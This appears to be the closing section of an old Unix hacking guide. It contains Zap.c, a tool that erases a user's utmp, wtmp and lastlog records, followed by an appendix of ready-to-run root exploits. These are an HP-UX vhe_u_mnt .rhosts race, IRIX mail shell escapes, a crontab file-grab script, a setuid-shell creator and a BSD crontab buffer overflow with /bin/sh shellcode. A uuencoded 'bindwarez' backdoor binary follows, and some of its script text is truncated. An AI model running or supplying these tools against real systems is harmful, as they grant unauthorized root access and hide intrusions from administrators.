      Title:  Zap.c (c) rokK Industries
   Sequence:  911204.B
 
    Syztems:  Kompiles on SunOS 4.+
       Note:  To mask yourself from lastlog and wtmp you need to be root,
              utmp is go+w on default SunOS, but is sometimes removed.
    Kompile:  cc -O Zap.c -o Zap
        Run:  Zap 
 
       Desc:  Will Fill the Wtmp and Utmp Entries corresponding to the
              entered Username. It also Zeros out the last login data for
              the specific user, fingering that user will show 'Never Logged
              In'
 
      Usage:  If you cant find a usage for this, get a brain.
*/
 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
 
int f;
 
void kill_tmp(name,who)
char *name,
     *who;
{
    struct utmp utmp_ent;
 
  if ((f=open(name,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}
 
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;
 
     if ((pwd=getpwnam(who))!=NULL) {
 
        if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
 
    } else printf("%s: ?\n",who);
}
 
main(argc,argv)
int  argc;
char *argv[];
{
    if (argc==2) {
        kill_tmp("/etc/utmp",argv[1]);
        kill_tmp("/usr/adm/wtmp",argv[1]);
        kill_lastlog(argv[1]);
        printf("Zap!\n");
    } else
    printf("Error.\n");
}
------------ cut here


************************************
* Appendix V - Other Unix Exploits *
************************************



..........................................................................
.                                                                        .
. 1. HP-UX Root vhe_u_mnt exploit                                        .
..........................................................................



------- cut here

/***
 *
 * HP-UX /usr/etc/vhe/vhe_u_mnt bug exploit.
 *
 * This bug is exhibited in all versions of HP-UX that contain
 * /usr/etc/vhe/vhe_u_mnt setuid to root.
 *
 * This program written by pluvius@io.org
 * The exploit code itself written by misar@rbg.informatik.th-darmstadt.de
 *
 * I found that the exploit code didn't always work due to a race between
 * the child and the parent, and that a link() called failed due to
 * the fact that user directories and the /tmp are in different file systems
 * so you must create a symlink.
 * I added in a call to alarm() so that the timing between the two processes
 * is ok..
 *
 ***/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define BUGGY_PROG "/usr/etc/vhe/vhe_u_mnt"
#define NAME ""

int test_host()
{ struct utsname name;
   uname(&name);
   return !strcmp(name.sysname,"HP-UX");
}
int check_mount()
{ struct stat my_buf;
   if (stat(BUGGY_PROG, &my_buf))
      return 0;
   return !((my_buf.st_mode & S_ISUID) != S_ISUID);
}
void pause_handler()
{
   signal(SIGALRM,pause_handler);
}
int rhost_user(user)
char *user;
{
  struct passwd *info;
  char   homedir[80];
  int fd[2];
  int procno;
  struct stat my_buf;
  int fsize;

   info = getpwnam(user);
   if (info==NULL) {
      fprintf(stderr,"ERROR: Unknown user %s\n",user);
      exit(-3);
   }
   strcpy(homedir,info->pw_dir);
   if (homedir[strlen(homedir)-1] != '/')
      strcat(homedir,"/");
   strcat(homedir,".rhosts");

   signal(SIGALRM,pause_handler);
   memset(my_buf,0,sizeof(my_buf));
   stat(homedir,&my_buf);
   fsize = my_buf.st_size;

   /* now the exploit code... slightly modified.. but mostly from the source */
   /* by misar@rbg.informatik.th-darmstadt.de                                */
   pipe(fd);
   if (!(procno=fork())) {
      close(0);
      dup(fd[0]);
      close(fd[1]);
      close(1);
      close(2);
      alarm(2); /* wait for other process */
      nice(5);
      execl(BUGGY_PROG,NAME,NULL);
   } else {
    FILE *out;
    char listfile[25];
    char mntfile[25];
    struct stat dummy;

      close(1);
      dup(fd[1]);
      close(fd[0]);
      write(1,"+\n",2);
      sprintf(listfile,"/tmp/vhe_%d",procno+2);
      sprintf(mntfile,"/tmp/newmnt%d",procno+2);
      while (stat(listfile,&dummy));
      unlink(listfile);
      out=fopen(listfile,"w");
      fputs("+ +\n",out);
      fclose(out);
      unlink(mntfile);
      symlink(homedir,mntfile);
      waitpid(procno,NULL,0);
   }
   stat(homedir,&my_buf);
   return (fsize != my_buf.st_size);
}

void main(argc,argv)
int   argc;
char *argv[];
{
  int i;
  int rhost_root = 0;
  char userid[10];

   if (!test_host()) {
      fprintf(stderr,"ERROR: This bug is only exhibited by HP-UX\n");
      exit(-1);
   }

   if (!check_mount()) {
      fprintf(stderr,
              "ERROR: %s must exist and be setuid root to exploit this bug\n",
              BUGGY_PROG);
      exit(-2);
   }

   for (i=0;(i<5)&&(!rhost_root);i++) {
      fprintf(stderr,"Attempting to .rhosts user root..");
      if (!rhost_user("root")) {
         fprintf(stderr,"failed.\n");
      } else {
         fprintf(stderr,"succeeded\n");
         rhost_root = 1;
      }
   }

   if (!rhost_root) {
      /* failed to rhost root, try user 'bin' */
      fprintf(stderr,"Too many failures.. trying user bin...");
      if (!rhost_user("bin")) {
         fprintf(stderr,"failed.\n");
         exit(-4);
      }
      fprintf(stderr,"succeeded.\n");
      strcpy(userid,"bin");
   } {
      strcpy(userid,"root");
   }
   fprintf(stderr,"now type: \"remsh localhost -l %s csh -i\" to login\n",
           userid);
}

--------- cut here

..........................................................................
.                                                                        .
. 2. IRIX Root mail exploit                    .                         .
..........................................................................


---------- cut here

#!/bin/sh
MAIL="/bin/mail"
RM="/bin/rm -f"
CC="/usr/bin/cc"
OS="IRIX"

if  [ ".`uname -s`" != ".$OS" ];  then
  echo "this box is not running $OS !"
  exit 1
fi
echo "creating rewt.c"
cat >rewt.c <<'EOF'
main()
{
setuid(0);
setgid(0);
system("/bin/sh -i");
}
EOF
echo "compiling..."
$CC -o rewt rewt.c
if [ -f rewt ]; then
  echo "done"
  $RM rewt.c
else
  echo "unable to compile rewt.c"
  $RM rewt.c
  exit 1
fi
# make dummy mail file for -f
echo "making dummy mail file"
cat >dummymail <<'EOF'
From mr.haqr@bogus.host.edu Sun Oct 30 00:00:00 1994
Return-Path: 
Message-Id: 
From: mr.haqr (Mr. Haqr)
Subject: Irix is secure!!@#%$^
To: root (root)
Date: Sun, 30 Oct 1994 00:00:00

gimme sum rewt d00d!


EOF
echo "running $MAIL, type '!rewt' to get root, exit  with 'exit' and then 'q'"
$MAIL -f dummymail
echo "deleting evil files"
$RM dummymail rewt rewt.c

exit 0

----------- cut here

.............................................................................
.                                                                           .
. 3. Root cron grabber - Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX .
.............................................................................


[crongrab] [public release]

Crontab has a bug.  You run crontab -e, then you goto a shell, relink the
temp fire that crontab is having you edit, and presto, it is now your
property.  This bug has been confirmed on various versions of OSF/1, Digital
UNIX 3.x, and AIX 3.x

If, while running my script, you somehow manage to mangle up your whole
system, or perhaps do something stupid that will place you in jail, then
neither I, nor sirsyko, nor the other fine folks of r00t are responsible.

Personally, I hope my script eats your cat and causes swarms of locuses to
decend down upon you, but I am not responsible if they do.

--kmem.

[-- Script kiddies cut here -- ]
#!/bin/sh
 
# This bug was discovered by sirsyko Thu Mar 21 00:45:27 EST 1996
# This crappy exploit script was written by kmem.
# and remember if ur not owned by r00t, ur not worth owning
#
# usage: crongrab  
 
echo Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX, others???
echo if this did not work on OSF/1 read the comments -- it is easy to fix.
 
if [ $# -ne '2' ]; then
 echo "usage: $0  "
 exit
fi
 
HI_MUDGE=$1
YUMMY=$2
export HI_MUDGE
 
UNAME=`uname`
GIRLIES="1.awk aix.sed myedit.sh myedit.c .r00t-tmp1"
 
#SETUP the awk script
cat >1.awk <aix.sed <myedit.sh <.r00t-tmp1
 sed -f aix.sed .r00t-tmp1 > $YUMMY
elif [ $UNAME =  "OSF1" ]; then
 #FOR DIGITAL UNIX 3.X or higher machines uncomment these 2 lines
 crontab -e 2>.r00t-tmp1
 awk -f 1.awk .r00t-tmp1 >$YUMMY
 # FOR PRE DIGITAL UNIX 3.X machines uncomment this line
 #crontab -l 2>&1 > $YUMMY
else
 echo "Sorry, dont know your OS. But you are a bright boy, read the skript and"
 echo "Figger it out."
 exit
fi
 
echo "Checkit out  - $YUMMY"
echo "sirsyko and kmem kickin it out."
echo "r00t"
 
#cleanup our mess
crontab -r
VISUAL=$oldvis
EDITOR=$oldedit
HI_MUDGE=''
YUMMY=''
export HI_MUDGE
export YUMMY
export VISUAL
export EDITOR
rm -f $GIRLIES

------------- cut here

............................................................................
.                                                                          .
.  4. IRIX mail exploit to make you any user on the mahine - BUT NOT root  .
............................................................................


----------- cut here

[irixmksh] [public release]

There are bugs in the IRIX mail proggies.  This sample script exploits them
to give you an suid shell of any user on the system, EXCEPT, for uid=0.

Obviously, this script should not be run if you are a clueless script kiddie
and have no clue what is going to do.  If this script causes any sort of
harm to you, physically or virtually, them members of r00t are not responsible,
and in fact will probably laugh at you.

r00t -- you may not like us, but your girlfriend does.

Script kiddies cut here
---------------------------------------------------------------------------
#!/sbin/ksh
# usage: irixmksh  - creates an suid shell of any user on the system
# except for uid=0

FILES=qfAA12345 putq /tmp/x usr

if [ "x`uname -s`" != "xIRIX" ];then
  echo "this box is not running IRIX - later..."
  exit 1
fi

if [ "$#" != "1" ]; then
  echo "Usage: $0 "
  exit 1
fi

TargetUser=$1

# Make the mail queue files
cat <<_r00t-text_>qfAA12345
P0
T830896940
DdfAA12345
Bblah
Mdeferred: just cuz...
C$TargetUser
Sroot
R<"|/tmp/x">
H?P?return-path: 
H?D?date: Tue, 30 Feb 1996 12:34:56 -0400
H?F?from: root (root)
Hreceived: by hackerz.dom (HackerOS/UCB 5.64/Hackerz Domain
        id AA12345 for root@hackerz.com; Tue, 30 Feb 1996 12:34:56 -0400
H?M?message-id: <9602301234.AA12345@localhost>
Happarently-to: root@plato.coolcode.com
_r00t-text_


# Make the script to run with euid=mail
cat<<_r00t-text_>putq
#!/bin/sh
cp qfAA12345 /usr/spool/mqueue
touch /usr/spool/mqueue/dfAA12345
chown root /usr/spool/mqueue/*5
_r00t-text_
chmod u+x putq

# Make the script to create the suid shell
cat<<_r00t-text_>/tmp/x
#!/bin/sh
cp /bin/sh /tmp/b00sh.$TargetUser
chmod 6777 /tmp/b00sh.$TargetUser
_r00t-text_
chmod u+x /tmp/x
chown $TargetUser /tmp/x

# Make the script to grab suid mail shell
cat<<_r00t-text_>usr
#!/bin/sh
chgrp mail b00sh-mail
chmod 2777 b00sh-mail
_r00t-text_
chmod u+x usr

# Now snag mail access and send the queue files.
cp /bin/sh b00sh-mail
export PATH=.:$PATH
export IFS=/
echo "blah" | rmail $LOGNAME
export IFS=

b00sh-mail putq
mailq

# Clean Up:
rm $FILES
-------------------------------- cut here

5. The Root BSD crontab exploit

---------------- cut here

/*
** BSDI/FreeBSD exploit for crontab
**
** For BSDi (Tested in 2.1) the default offset should be OK
** For FreeBSD, the offset seems to be around 1000
**
** I didn't find this hole, I only exploited it.
**
** Brian Mitchell brian@saturn.net
*/
 
#include 
#include 
#include 
#include 
#include 
 
#define DEFAULT_OFFSET          -1050
#define BUFFER_SIZE             100     /* MAX_TEMPSTR is 100 */
#define HAPPY_FILE              "./Window"
 
long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}
 
main(int argc, char **argv)
{
   int fd;
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   
   char execshell[] =
   "\xeb\x23"
   "\x5e"
   "\x8d\x1e"
   "\x89\x5e\x0b"
   "\x31\xd2"
   "\x89\x56\x07"
   "\x89\x56\x0f"
   "\x89\x56\x14"
   "\x88\x56\x19"
   "\x31\xc0"
   "\xb0\x3b"
   "\x8d\x4e\x0b"
   "\x89\xca"
   "\x52"
   "\x51"
   "\x53"
   "\x50"
   "\xeb\x18"
   "\xe8\xd8\xff\xff\xff"
   "/bin/sh"
   "\x01\x01\x01\x01"
   "\x02\x02\x02\x02"
   "\x03\x03\x03\x03"
   "\x9a\x04\x04\x04\x04\x07\x04";
   
 
  
/*
 * The sscanf line reads for 'name' as %[^ =].  Neither a space, nor
 * a '=' character appears below
 */
 
   
   int i;
   int ofs = DEFAULT_OFFSET;
 
   /* if we have a argument, use it as offset, else use default */
   if(argc == 2)
      ofs = atoi(argv[1]);   
   else if (argc > 2) {
      fprintf(stderr, "egg [offset]\n");
      exit(-1);
   }
   /* print the offset in use */
   printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
   
   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   /* fill start of buffer with nops */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   /* stick asm code into the buffer */
   for(i=0;i < strlen(execshell);i++) 
      *(ptr++) = execshell[i];
   
   addr_ptr = (unsigned long *)ptr;
   for(i=0;i < (878/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr++ = '=';
   *ptr++ = 'X';
   *ptr++ = '\n';
   *ptr = 0;
   printf("Writing to %s\n", HAPPY_FILE);
 
/*
 * The sleep is required because as soon as crontab opens the tmp file it
 * stat's and saves it.  After the EDITOR program exists it stats again
 * and if they are equal then it assumes changes weren't made and exits.
 */
   fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
   write (fd, buff, strlen(buff));
 
   close(fd);
 
   execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); 
   /* Successful completion */
   exit(0);
}
----------- cut here

*********************************************
* Appendix VI - UUENCODED FILES             *
*********************************************

1. Quantum's bindwarez utility uuencoded

Bindwarez binary file for use with Quantum's PHF guide for login shells
in the PHF section here.

begin 664 binwarez.zip
M4$L#!!0````(`'>"0B)K$\T.%CD``.QW```)`!``8FEN9'=AUQ41]+HF6$&!QP<5#1H4$/R[\ZO2I[NKNZNKJZNH^/>=L
M-66EJU0J0?E3"R$"88]I=+,@>$YB\;,$HZ`5XH110I002CA`/=``[()[!"V`
M!B`$X"0"I"&,A/N1/$W%@?X@#2'L/D%`P/Q")$N/!#SRDD:'T`$5[IHL4+V8
MKH;`_%,`E5:'X`8<(937,;VB;/7TBM)I%665MHWQM57QB<+Z5(B_FU>[@(>W
M`.0`+`;(`I@&,!,@%Z`0(!S@)H";`3#_(IYO*0`Z
M@-LXS7*`N_A]&,!D?J_G80CG>RC`?&P;C[\3P``0`Y``,(_'+P-(![``3`+(
M!I@-4``P7`C\H;^
MF_)^[&_,5>)">7C#@/C1`+<"3!D0/Y6'<5S+YC^I(!C)=#>%R%L@O1ZGOXZE@?\;^0X\M4"^%2.OPUP
M"O`X7O\'V![`Y_+TC[$]@-_$\<\`="`O&\?/`W2"O)F\A@L]$)[EN!%["]HA
M`Y['T_6`SX7\6WC^$8!G!,E_#.#+@O#Q@&\$/$/%\,D0SE<'ZKL5\"9(WQO"
MRDL"_"G`E_'\BS#]4XWN3JHO3%@,^!Z>CO39@+<$U9<'^/$@_&[`3P$^A]/?
MB^T!?#5/MP+>#?B?>'HMX+H@_=@$>'00OA7P.'>`OP=1'H"G\_P[41[N0/\^
MB_)P*_TO"+]6!?33"/KY(LHGJ/Q]V-Z@\E]#>0!>P?$W`5\$\E-S^7V(\@BJ
M[^^`IP7)]PN43U#Y7I0/X/_B]-^A?`!?R?%>;#_H;X::X2$0Q@&^DZ>'`3X7
M<#,O+Q+PC"#]'P7X,L!G"K'YP)^_%$V
M'K&\%,!/!96_&'#YTR?$_8?N"
MRF_!]@7AA[!].P/V[2VL/ZC__@O;&T3_=W5@?%+_`J[A]@7MQ]=J-IX5_/L!
M.$ZX>R<$X>`O2-::=27%U>@MS!!JI9J2ZDU"656)5"$4I2W/3EZ2F2JLM4K6
MRO5"41$D2U451665D*FRN$)85UQ1454""9!<5E-5*4!2F21LJ"F3K%A696%M66K45^BXI*I$W5UJ+5`B165@E%F3G0IE)`L'AK2850S7*5VJI!&!56
M:[5052T5UZQ%&8A5M=+J3<6EI35";57)?5:HA556M+%6*@;>:JW6^X02L6I#
MI;#Z?FM-%:17EF+.TJIUQ665E<7KK)"\KJH4F,?[XI(2:S5D+\)6,=&5K(%6
ME=566ZVE`C2IU+I14&2[AK=Q-41#R1+R4$79UU3;BDJJ*J6:J@I60!4K`%*1
M%@2/]];*BJJU`HD=;_S2JX*^J2BKE;!3JFKN8_T%S0&^L7CHLN(*J0S8+:NT
M2D654E6Q()5`8K$DU0B44+NIEDH4;=!2:+Q?5M1*P&JM->LYM@;0$H6"8FIY
MNR`.N*YA<5+-&BH:.U2"]I5L$(I(`4AYL/5EIAE:NA'D9"TMEHI)(6JAUXMK,`K$\\2'*3A&M&/97*>-87.4=B*SM=K9S*9J
M;V=C3YO/QJC6@KZ?5C<$YS0,H]`?@7`4^L40XEC&<#3ZV!#>@/XMA-'H)T,X
M!OU9"&$PK\00'--[,03'K!1#<(9$#,%IK<`0',-J#(V"(&$(!F$CAC"Y;\80
MG/!Z#,%X-6`(SE,3AN`
MW\40%A4=&`[%-1*$X(2>PA!LZ1D,80'0B2$L4LYB"$95QA`6'.!,)1:\5[$3<2CMHK8H,\D82C%HO5B`N$HS:+Z.)ZSOZG]
MA.-H$%NH_83CJ!!;J?V$X^@0CU/["<=1(G90^PG'T2*>HO83CJ-&[*3V$XZC
M1Y2I_83C*!+/4_L)Q]$D=E/[+R/>0OVOPO83_CKU/^(=A+=2_R/>2O@QZG_$
M]Q)^G/H?\5V$OTO]C[B;\`[J?\3K"3])_8]X->&GJ/\1OY?P,]3_B)L)[Z3^
M1WP1X6>I_Q%/(%RF_D?<2/@YZG_$(PD_3_V/N$#X]]3_B)_O1;R;^I_:3W@O
M]3^UGW`TG'*V&V$GM)QRMARA3^PE'
M*R*>I_83CM9$[*;V7T(P^>3L+1NHCH\WLZ"$AG]:($'*&`HT'N!XY8#<="O]@5X%:0(MS/$UV$_JK'?
M(=B^7W'4->>HV^T&?NSGC(4%EG;3.,VDV=QX&A=JUYA%97<:,6[HPW
M*'=Y$-\D!]OLFNVQ[7Z%QS)OQ,H],/@*@GKHP;+,C_C;P*G'N\/W[\
M&F6>@GCG;/1H#B5"JU_%_:_>/<)W_VEH1)OAT[X`4O%\!9;(-8?3S4&Z(0J=
M+:(^8C*(;[CG32!RQ5\%.+B/9!;M.%E!U[0QY,W]&"O1WJ^@]YW
MK1?,XN/^I)64I)?GXX#YD*4WHP,X]2AHC"OJ`4=^IWT!"DTP-."&@/V2:DNX
M'('D_R$0:BL2_\`4S*DVR\]?P@)UC:TVB6+*A?+P,BC*@_81W']&N:D>[!8]Y$UQPJ7GP/!]\2?^FCQ;_X,SX)&A6D<[%-CHJQLI7L(RDKJ)NN82ZD"YQF4Z9RY7EZL*
MY6HL)E(\!;D+9F;K@8B21_OT`D
MT4#2;I+19W&[3+*9E]B,K+0A*UU0Y@V8X266X*E/^)10(37NG7"B0=T-2
M@3P-BBJ4IU"K([U#77,:3V_1RH]`R>71Y5IQ/!;BZ<;JSF)U+M-9LVO5>4NY
M(-=2QT8#"84IL=5E/KKBGR'%NU5'@'6R7>+N_@E"L(-V/7H!:1+,?
ME1%]P(_^UP62M-CDCVE'@AU^M(4Q>1BD@S9RVSF<+0HL/NV]8/J:\;*['B[`
M;;1\!L0`-T;Y0W9SD_PVNYDB'XY$S3)ZM?)6<`\-![7B<+#(K9H].MO7VT=5
M`V(X>(3A?X/46G_J^X!M\&.'NXYHI)CRT&8TM&;Q&Q"9W(9-(,L;"OW;17F#
MB;Y'HN8!1!L&$/4@T>8!1.(`(AF)"@<051/1:.\0UQQY-RR$FE$<25H)KIN_
M4;BYP:M#';,'TC?S]`W!Z26!](T\G7@P-)R#OF_M(MOCVH>.(90;1%(@IT*BO#U0W(=H;(Y%
MPO!8VX]N*"NDL54*XUS87@DBL,A?_:`0Q,OS^C-BD?_L3QQ.\19>VYL0WX+N
MNNO7W6`45]R#:@ZZIW1(RA7*UZ^#]O\0W$'4+T-O'B`S&CASF#[#N'*:P#O`
MR@7;4'(>6+K9U2C`8#++G_U`MN%L8BLF\'&@PG'@7*63/X7E\^YE4"Z,]Y'B
MDS!TFM.H(`\C=B=&/D20TY0O-8GTH
M#+JCW_M\;=I#<"N4+Q);PR'J/)"P.VH?&AGHQ;UH^)9\]3S>CY=.,3-0=
MACETN/PNQJO%#[&GJH%UQU$K&F?69;FJ8!XN)`2)'FT4\
MAX@!D48WI?X3(_I2(`*XB;:_@;&"-,9)-_4+!6E8(=/)9__)9NC3MF$'OH5,
MWB$'OH,@L8N2"^2WIS`V%A"3TLCZ.R"O6`_3I46^/X[2G*-$<+4;3T@WN%)4
MYN;G+J'B(H6L(H77MVLQ#F,23A_$P'&AZ92_7]^^<,+1D;$;RV#JH)+FBT//
M@KL4@5V]5'[^6T4?''_ME_.="Q\ZGGD<99(WUN<8Q14#?#'.`6$B:WD-H)6??>\ZXD6B`G&G^J'-^."(8E,E"V,E[5E&.B-X7D7
MYO3JP3^NTQN>?P-+;C:3X<*%!U(3"UOTH'F&YQN).ISE1%K[@JSA:,7"G740
M]0966RZX&C$$8];"`B0TET?*7R\"?HZ`>]%X8NMD>X_/!NVB+7]#PP@0`XS4
M`]^0+GE"?-PW!8X-NZDXP\[6ID:44`,I6A8?S;G(1S5N&AC^0
M^0?C(>*BB0^!GX..[,86D5&L&\T8&&J+:->^P!\>>*/=O-&&'4XU6@YEX<7Z
M5"O-;<9DLWC+6?]`/W%^$`-=SPK02&-8`@K,AF''#O0-D,BP/])'U-F.V9AU6P]6
M8`MK"PGFO"F2(?:>"%M&E]9,1G6AHOEQ5-+VR/J><%N,GQ[C6"[&E-?@YE(0
MN!2HPL8NPR.X3P!3./14RP#-C*(LM](*O;$5O'U([+N.DP=P)TWW=\'2+(4\?A'-EP">?((NZGR%%`(SNC
M<#1@"3X:N\Y1SXW6ZO9N!6NFWJYN4@5\=_DL.!#RBBOHCR%]S%7H7QX_D/0D
MDHX-)@4Z9H?%I8'./O#UOQT6SKI>9:Z7CX\<6,^[6(]F0#T6SSLP%("WEHH)
M*"\D)2TY`M$TJ`S[HWTT;'_B&(6R;U[6JP$2G>&A=1K<^VB,^S7N?:R%ZPL`
M60!S]VATU0`K?ZO1E0)4`$B_Q;T8S(N#J/&TH2%7@ZO@<$-#)MQLNT2Z-YR1
MH#7RS-#0.+L481O)U$YC"V?)^%R;^K%,!+WJ`:(#O?Z/1Y?R6P3*XG_N?&ET4P&:`90#ZWS#`]*<@?!G@&,!)@+,`
MDZ$,Q3\99A'O18,3%TLSGOPZ>+R>L2$D3TYC:,"'[YQ.8'2>5C(9_?X[[Z^(8BN,*'%*E3"J$X>VO?;@QW
MY_72]B<7CCPZ3!""AM?[OT"D,
MD&^0[[;(_\";T;#6!/7P#K/(XAP:30Z=XIM/]V/Z@*K%%R9##P
MF,IBY.F?TT;'*1E-)!JIQA.&1W"?V;FJ-V![<<%GK],+4E+]@?D&=+7"NNS,
ML!1LIQM8A639+X7:PNMC"P"]X`USZW5-E-1GQRP6<4ZOWR)/E97I-\3OD$1*
M0RWB8\C32/0$6/5HSVFYF=B5Z`M2_%\BG==(BK^=RH=I[[:F(WUO-SV&V'R5
M-)YS*.DT?4U$PGDW-*+NL52=H5%+.XQ3#`^=QF>#DY]Y_7<:G7OE\V!W`1X!
MV,%#A%-!]_\=V/%OTA#JKT&+N'Q3!*XAY1A8G,F+X3X=>SH&QF.6HB2&^@@!
MQ!52'Z'#(+VQ2QI>[Z1&E\,:ZF:PEM[)K&\`]T:Y<5]U=*``6OS%D`[I6#Y-
MHT]2^SYR6;]7-N'F!.O&+0-U0UJLZ(:T8/*%_LIP1T`98KZXAC*\B)T<.L&O
M#`%=#-*$`TB$>Q'_7A-L5VK"MB!-:)`43/3,_C0+1=B[HQN5>O:J*[[5J='\<[;[9K3O`$@OM'WGG]XW"OSWMS_SC<
MW_..Z!^'>WI,$9J.U/_C0M-CI!,P+E$-#\#$7[\;8R[Q7G8/T*F,R""=4MD4
MG5+;%NC5BDXAC45<%-"IXY]=0Z?>0G7Y8\P`G>(F)DBM/D*Z[3%(WPN^$0^_@?![?C]8
MT%T'[?6`?%1']N7IH3B[P)S])X:_"[C\D8[;F[O`WJSDYB+=NX#6!A9Y?I_2
MI;W>/(BKCUB-@B@7RD?(^+R>X2JY(XK4]&^TOZ0'\S2"F1DU%G(!]`+6/JQK
M,0)/[[%TEK`@V-_W/[\
M"XF*QPY&46Q7*@J>1U84I6$7>[@E3=JJ:SPMZ;WKT80L++"
M>7_,+3_0]@83W?-V4X;DCC.+C>-PML]*DD/D@^13_31OE1]+,;V-6.W
MS5+MQ@"\X`3:O[2#7^.-=0?&ZF4^5E5LK#[B[]B^H+%:8%&D,5&^#+WD'$7N
M#'HP4SOLK6IS;OE\^>4QU,GDY!CV"\SEL;=>LG=/,CR4R59#L_X(ZZ"7-;KU
M^_]G0/K3M=,F0SVM?PS@YP?4NV@?KE6JF2_[6UP1#3!\U)(D+;;2\&!3")Y$
M9XUJ:#4T;@SAGI_R)'+,&=JJ=!RE6(5T_FV2T3D*BV"^;5*'P;X@J*CYM]F^
M[%>/,00[G179=IJ*-%O*C?)X$*`G)(3\;_Y4Y`=U?YZK!_)\4MV?YV.TR82[
MY5EJK:X%+PLDN-2F!F5;/X=V/JB#\4A?5YI9!%S%8)8CA_\Q,,M9EA1VA,7G6LHGR'BZU_..?VVAB.951LH(&UL-
M#7BT!9?VC;^DY6<^#F9#`YY%EW^/ITJ:V%J&V*?^Q)[$H^[!`BY1]>\1G"K;
MU&!4*9]9]*$AZ3BM+)/X^D+A*;8_3[81`V=8;YB]&R:;R\JB(\#(5T(P(U(8
MU[4:;[\*CN$V;9OCV\33@?'9K9)&;$7[$..M`%O4K99RO"5N8-HY#M,='WN7
M`9^`%\B/*(_>I'%@NR++598".8145(_/D`ODGYVB357G;,H)U7AC^K=Q_3A_
MQ4WJE&#>'BKW^7Q4RU1_+=%0RS"JY9F/P6J%05D%\@RHPS\YH&TJ%\1+Z,I.
MDB\IC[?(ABO/L>2L8^%+\1#HDNGQUHK[#]1>GK/\]V[_42:/:
MU#TI;>J)*=OIT1"T'*F1$$/V-,OQUZF?`*_'T)_[103--/X)J,!2?J=<`#.I
MO"WBRN=6_J=Z=,Y'ATNI.IUSE=YIBY0_Q=G&-T'2V7U&::%WE=LQ;@]VS>SG
MJ&L/_R/2\(JI.ZS#8>IVG%\#5Y>IVRQ&Y2F/R^2S?V7=>Q/(U#'N:^U1N!QZ'"X'
MT*MP%^86./)['4NZY9_AMJX=:9Q+NMO2QJ@%N(30;G5^K_V(SMZNLQ_5I=O[
M1FQY.U`1K1]%7&ISIJ?_E\]W:#+@!S&REP[8?/=K4!H_??ED$=,IDWS^+\J3
MRQ$44:XT_@*4$]`G9[[>N232:=)EV+N'&Q[:3XY>H^Y56C_L>DVC0W@*T$7\
M'F$OX&:`97`O0E@/T`T0"7@TJ#/&7#M2U[NW:
MD3Q^Y(#X*!X?-2!^.(_'L&5U('X$CQ\Q('X,CQ\SH)RQ/'[L@/@)/'["@/AQ
M/'[<@'@CCS<.B!_/XS%LF12(OY''8]B2$HB/X?$Q`\J9R.,G]HL'B]*NHH-S
M(?YGW_ZXP#-O^[DTT%,Q_G.83#(N0Y?)]WWD\]&M*T/G6/*Z:V-88A=Z?P\F
M`8USR>M-JK8A"^!9ANV/,T."%CW!H^C.IT@#:V/T$/C
M=!AIC\7;"_W3[;&HOG_'R/H(O#7V2Y_0K(.XV/?!>N@3=N.]/58#USZNXY0\
M^?T(//1*R?41F*SLA3=CB8=E[2R5O=,?AP3^"#9.*"X6?Y6X`"^&QUMC?7[9
M*[P8ME'92$`\;B-.?%_R`8=TS7JJ+RRX/IZ7&N^[S(C=VT@L>'@GD%<@'E3!
M\X$S'SP>D+E]`5Y]DCXIL@[<4YU]KL_VO7.1QLRLP8D/@W@89)X[@_.`S0.#
MK1970.?+C_^%'<[2-7;YGVT7R#L^P$-8>\CN1'+EZ*.Y&2>^KKHH%L=W>^>&
M,?,:14]!T7(+^+04#;D@W5:N1]P3,>7+?(NO%73K>DDGE:IT](0&;"7(,]EB2/%R@`GO4/8<0U!
M'$:G"J(Z^!@%L@T!LK\P,O`WAF+E6XA*A^NTH>!_R)4*KI9&EZLM\CU^?$NH
M1>[\$)^1]UL_TB1,,_!-)_!P0^-IJ*\A4)_57]\PVH)[XWWP;V+H_!]@OP=,
M_B.H=T$A*&"NC#_^#FS(47L/9.#TY4`5>Q2H=R,*$UB$O?4RW1_(@DL[VCSP
MQ_'D,48.W&\%_L2'/\<5C/P<:E^[N/-S/%'X)"&60GD'BWV"8K<1@B?J_@.K
M'?N^Z3?]7.GV:++1XK/8DTJ>48';4:CON*9K\<0
M%<0_0J+X"N;Z!^02#P5$-2\TN/%L'RI=E6'.V;8
M6_7F7#FM`TN#HD,36[WCP1\^H@ED<66I3SG&M"=KJ.R.P!:%LK\TFZ:#>[06
MN6."XL2.%)_"MN'%(K](T7H1G0<^[H^\AP(H5]!:0-O2M=7!)+_L3V(FN<;!
MM,(D5,TD>K&#G6,L5`Z$S!!?^=*_`?*+CL&<#PHZOB%IY9$A5SG7@/P&G6L(
MAYJW=E!?PHH%._BGR(?"PTRS>"S`Q.C!,*$/'(.0-_T#31Y[ICWF:F?5Y4*@
MX`]VR?9.1M6V@4WL="OG5O[>^]WSAN=MG6*>#_H`!>E*5YGEM\;S,R)X/B2,
MGP^1WFX\41+KU/&8A16V>L:T'9ZNMM]A;0[C^N\QJMV&_.F4!/=;[
M@6[Q29WM*T<'^2NMZH"OI8$^.H2_)7#-*91W^M@,J4F:C
